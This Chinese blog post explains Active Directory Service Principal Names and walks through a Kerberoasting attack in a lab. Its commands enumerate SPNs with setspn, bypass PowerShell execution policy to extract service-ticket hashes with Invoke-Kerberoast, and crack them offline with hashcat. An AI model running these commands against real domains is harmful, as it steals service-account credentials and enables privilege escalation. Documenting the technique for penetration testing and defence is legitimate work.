SPN与kerberosting攻击

最新推荐文章于 2024-03-11 17:17:57 发布
最新推荐文章于 2024-03-11 17:17:57 发布
阅读量10w+ 收藏 2
点赞数 2
分类专栏: 内网渗透 密码破解 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/109115769
版权

CATALOG

1. 前言

SPN是域内一个服务的唯一标示名称。SPN类型分为两种:

  1. 一种注册在AD上机器帐户(Computers)下,当一个服务的权限为Local System或Network Service,则SPN注册在机器帐户(Computers)下
  2. 另一种注册在域用户帐户(Users)下,当一个服务的权限为一个域用户,则SPN注册在域用户帐户(Users)下如果用一句话来说明的话就是如果想使用 Kerberos 协议来认证服务,那么必须正确配置SPN。

SPN格式为serviceclass/host:port/servicename

  • serviceclass可以理解为服务的名称,常见的有www, ldap, SMTP, DNS, HOST等
  • host有两种形式,FQDN和NetBIOS名,例如server01.test.com和server01
  • 如果服务运行在默认端口上,则端口号(port)可以省略

2. 利用思路

  1. 可以用来探测域内有哪些服务,分别开在了哪些服务器上,以哪些账号或者说权限去开通的。
  2. kerberosting攻击,获取对应服务的TGS-REP响应数据,并进行破解。

3. 实际利用

3.1 探测内网服务

setspn -T test.com -F -Q */*
在这里插入图片描述
这个操作是可以在域内任意主机上执行的,不需要多高的权限。因为我的虚拟机上没有开多少服务,这边给大家另外一张图片作为参考:
在这里插入图片描述
开启了一个http服务,这个服务器的主机是csk-github。

3.2 kerberosting

我们使用一种不基于mimikatz的kerberosting攻击,且这种方式不需要高权限,这是看三好学生的博客学到的,地址是域渗透——Kerberoasting
首先将Invoke-Kerberoast.ps1下载到目标主机并且import到powershell里面,然后再用hashcat工具对hash进行破解。
具体操作如下:

Set-ExecutionPolicy Bypass -Scope Process #规避执行策略
. .\Invoke-Kerberoast.ps1 # 加载模块
Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | fl #取出账号有关的所有参数,-AdminCount表示选择高权限的用户
Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation # 只取出hash参数
hashcat -m 13100 hash_path password_hash -o found.txt --force #破解hash并将结果输出到found.txt中

1.使用票据来破解密码:

先使用脚本获取到一张tgs,然后用mimikatz导出票据,最后使用tgsrepcrack.py脚本爆破。如下图,密码为123.
在这里插入图片描述

2.使用hash来破解密码:

powershell -exec bypass "Import-Module C:\Users\zhangsan.TEST\Desktop\tools\invoke-kerberoast.ps1;Invoke-Kerberoast -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation
hashcat -O -m 13100 hash.txt 1.txt -o 123.txt --force --self-test-disable

在这里插入图片描述

将上面的hash复制到文件中,用hashcat破解:

hashcat -O -m 13100 hash.txt 1.txt -o 123.txt --force --self-test-disable

在这里插入图片描述
如上图最后一行,密码为123,也可以在123.txt中的最后一行看:
在这里插入图片描述

参考文章

域渗透:SPN和Kerberoast攻击
域渗透——Kerberoasting

Shanfenglan7
关注
专栏目录
域渗透-Kerberoast 攻击利用详解
内心不种满鲜花就会长满杂草
03-28 2866
Kerberoast 攻击是域内渗透中经常使用的一种技术,主要通过利用 Kerberos 协议的特定阶段和加密算法的弱点,尝试破解域内服务的密码。利用前提:获取了一个普通域用户凭据。SPN(Service Principal Name,服务主体名称)是服务的唯一标识符。每个需使用Kerberos来进行身份验证的服务都需要一个SPNSPN的存在有助于确保在Kerberos身份验证中能够正确地识别和授权服务。
.NET中的Kerberos验证与SPN设置
lxf310的专栏
10-17 467
.NET应用程序中涉及的Kerberos验证浅析
内网横向移动—Kerberos攻击&SPN扫描&WinRM&WinRS&RDP
剁椒鱼头没剁椒的博客
07-24 1087
文章中很多的环境,由于都是自己搭建的,有时候可能会出现无法测试成功的情况,有人问为什么不使用别人搭建好的靶场,主要是懒,不过最关键的是,这些环境太大了,自己的小破机器带不动呀。同时后面的文章很多之前介绍过的操作方式,我就会直接说,而不会像之前一样,一步一步操作,就比如我要设置socks代理,我就只会说,这里需要设置socks代理,而不会在去一步步演示socks代理如何设置。
kerberos中的spn详解
渗透测试研究中心
12-21 429
0x01 SPN定义 服务主体名称(SPN)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。如果在整个林中的计算机上安装多个服务实例,则每个实例都必须具有自己的SPN。如果客户端可能使用多个名称进行身份验证,则给定的服务实例可以具有多个SPN。例如,SPN总是包含运行服务实例的主机名称...
内网渗透:详解kerberoast攻击
A_991128a的博客
07-29 536
上篇文章介绍了kerberos的协议的认证流程以及可能出现的安全问题,也简要说了一下kerberoast攻击,本篇文章就具体介绍一下kerberoasting具体原理以及如何进行操作。关于内网相关的文章已经发了两篇了,大家感兴趣的话可以找以前的文章看一下,后面会继续出关于内网方面的知识。内网渗透:Kerberos认证协议安全性分析内网横移:抓取域管理员密码首先再来回顾一下Kerberoast协议的认证过程。kerberoast认证过程算上PAC可以说有四个个阶段。如下图所示。
华科密码学课设之SPN的线性攻击以及暴力破解算法
04-07
除了实现华科,密码学原理书上的线性攻击之外,其余的6个子密钥通过穷举法攻击成功。
5G时代SPN与PTN融合组网建设.docx
05-22
### 5G时代SPN与PTN融合组网建设 #### 一、引言与背景 随着移动通信技术从2G、3G、4G发展到5G, 相对应的有线回传技术也在不断进化,包括SDH、MSTP、PTN以及最新的SPN。其中,SPN被认为是PTN的升级版,在接口速率、...
基于层次扩展SPN 的网络攻击模型 (2011年)
05-22
当前网络攻击模型对于复杂系统的建模能力较差。为此,提出一种基于层次扩展随机Petri 网的全网攻击模型。该模型对宏观网络攻击和微观主机攻击具有较好的综合描述能力,适用于网络协同式组合攻击行为的模拟,并能够...
SPN和FMI自制计算器
02-21
它与ECU(Electronic Control Unit)的某一部分或者车辆的特定系统相关联,如发动机、刹车系统或排放控制等。通过SPN,可以快速定位到出现问题的硬件或软件组件。 FMI(Failure Mode Identifier)是故障模式的描述...
Kerberoasting学习
mingyqf的博客
02-24 856
Author: Shu1L Link: https://shu1l.github.io/2020/08/05/kerberosating-gong-ji-xue-xi/ 前言 Kerberoasting攻击是Tim Medin在DerbyCon 2014 上发布的一种域口令攻击方法,Tim Medin同时发布了 配套的攻击工具kerberoast。此后,不少研究人员对Ker beroasting进行了改进和扩展,在GitHub上开发发布了 大量工具,使得Kerberoasting逐渐发展成为域攻击的常用方法
kerberos提权
qq_44881113的博客
09-09 125
use incognito list_tokens -u #显示可用的token 可以看见我们已经获取了一个系统管理员的授权令牌 WIN-GMDFGOL4157\Administrator impersonate_token WIN-GMDFGOL4157\\Administrator #在incognito中调用impersonate_token命令假冒administrator用户进行攻击 (注意在输入token时 中间是两个反斜杠 impersonate_token WIN-GMDFGOL41
Kerberos安全系列(9)-Kerberosating安全测试
prettyX的博客
02-09 753
Kerberoasting攻击是Tim Medin在DerbyCon 2014上发布的一种域口令攻击方法,Tim Medin同时发布了配套的攻击工具Kerberoast。此后,不少研究人员对Kerberoasting进行了改进和扩展,在GitHub上开发发布了大量工具,使得Kerberoasting逐渐发展成为域攻击的常用方法之一。 Kerberos协议的认证授权过程,3次涉及使用不同账户的NT...
内网安全:Kerberoasting攻击SPN服务
god_Zeo的安全博客
05-27 1949
0x01 SPN SPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)的唯一标识符。 SPN是服务器上所运行服务的唯一标识,每个使用Kerberos的服务都需要一个SPN Kerberos认证过程使用SPN将服务实例与服务登录账户相关联,如果想使用 Kerberos 协议来认证服务,那么必须正确配置SPN。如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的 SPN SPN分为两种,一种注册在AD上机器帐户(Compu
深入理解 Kerberoasting 攻击
最新发布
qq_31812157的博客
03-11 652
是一种允许攻击者窃取使用RC4加密的KRB_TGS票证的技术,以暴力破解应用程序服务HASH来获取其密码Kerberos使用所请求服务的NTLM哈希来加密给定服务主体名称 (SPN) 的KRB_TGS票证。当域用户向域控制器KDC发送针对已注册SPN的任何服务的TGS 票证请求时,KDC会生成KRB_TGS攻击者可以离线使用例如hashcat来暴力破解服务帐户的密码,因为该票证已使用服务帐户的NTLM 哈希进行了加密。Kerberoasting攻击主要步骤如下1.发现SPN服务。
kerberos协议从0到1
蚁景网安学院
10-12 698
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题技术相关的调查或分析稿件通过并发布还能收获200-800元不等的稿酬概...
内网渗透测试:SPN 与 Kerberoast 攻击讲解
qq_53058639的博客
08-20 169
SPN,ServicePrincipal Names,即服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)在使用 Kerberos身份验证的网络上的唯一标识符,其由服务类、主机名和端口组成。Kerberos 认证过程使用 SPN 将服务实例与服务登录账户相关联,如果想使用Kerberos 协议来认证服务,那么必须正确配置SPN。在使用 Kerberos 身份验证的网络中,必须在内置计算机帐户或域用户帐户下为服务器注册SPN。对于内置机器帐户,SPN 将自动进行注册。
域渗透:Kerberos认证学习与Kerberoasting攻击路径的演示
小王的储物间
03-10 614
本文介绍了Kerberos认证过程,并用wireshark抓包解析内容方便读者理解。同时分析了认证过程中的漏洞点,从而引出Kerberoasting攻击方法。并以HTB-Scrambled为靶机,以kali为攻击机展示了实际攻击中所利用的工具和指令。0x01 简介Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 /服务器应用程序提供强大的认证服务。
域渗透 | kerberos认证及过程中产生的攻击
st3pby的博客
02-20 7094
Windows认证一般包括本地认证(NTLM HASH)和域认证(kerberos)。认证的原理网上有很多文章。如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课本篇文章主要内容是Kerberos认证过程中产生的攻击Kerberos是由麻省理工学院提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。Kerberos协议有两个基础认证模块:和,以及微软扩展的两个认证模块S4U和PAC。kerberos是一种基于票据的认证方式。
Kerberoasting攻击
无心的博客
09-28 3079
前面我们介绍了《Windows本地认证》、《Windows网络认证》、《Windows域认证》和《SPN扫描》,这次继续讲解域内相关的东西。 0x01介绍 当发布Windows 2000和Active Directory时,微软打算在 Windows NT 和Windows 95 上也支持Active Directory,这意味着不仅会产生各种各样的安全问题也会导致更多不安全的配置方式。同时,也意...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值